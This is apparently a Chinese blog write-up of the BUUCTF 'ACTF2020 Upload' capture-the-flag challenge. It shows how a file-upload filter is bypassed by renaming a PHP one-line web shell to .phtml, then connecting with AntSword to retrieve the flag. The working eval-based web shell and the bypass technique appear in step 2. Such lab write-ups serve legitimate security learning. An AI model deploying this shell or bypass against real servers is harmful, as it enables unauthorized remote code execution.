文章目录

• 一、检查源代码
• 二、文件上传
• • 1、先尝试图片是否能够上传
  • 2、burpsuit抓包、改包
  • 3、使用antsword进行连接，获取flag

一、检查源代码

拿到题目之后，我们首先对页面源代码就行检查，源代码查看之后并没有发现提示或者有用线索，所以我们只能回到文件上传中找答案。

二、文件上传

1、先尝试图片是否能够上传

首先，我们尝试上传一张图片，发现图片上传成功

2、burpsuit抓包、改包

注：这是我准备的一句话木马，用来上传图片的
<script language='php'>eval($_POST['a']);</script>
当我们把上传图片后缀名改为PHP是，网页右上角显示了nonono~ Bad file！所以我们把文件后缀名改为phtml上传，文件上传成功。

3、使用antsword进行连接，获取flag

http://a1fb3d86-c636-4d5a-a7b3-2cfbe8bd466b.node4.buuoj.cn/uplo4d/ad898f6bf1eda88f1ca04a806209e28d.phtml

flag{bbd330b4-4ce9-4e11-9614-2de4ce5865b0}

注：2021/10/28

标签：文件,ACTF2020,Buuctf,Upload,后缀名,flag,源代码,上传,图片
来源： https://blog.csdn.net/qq_53030229/article/details/121025399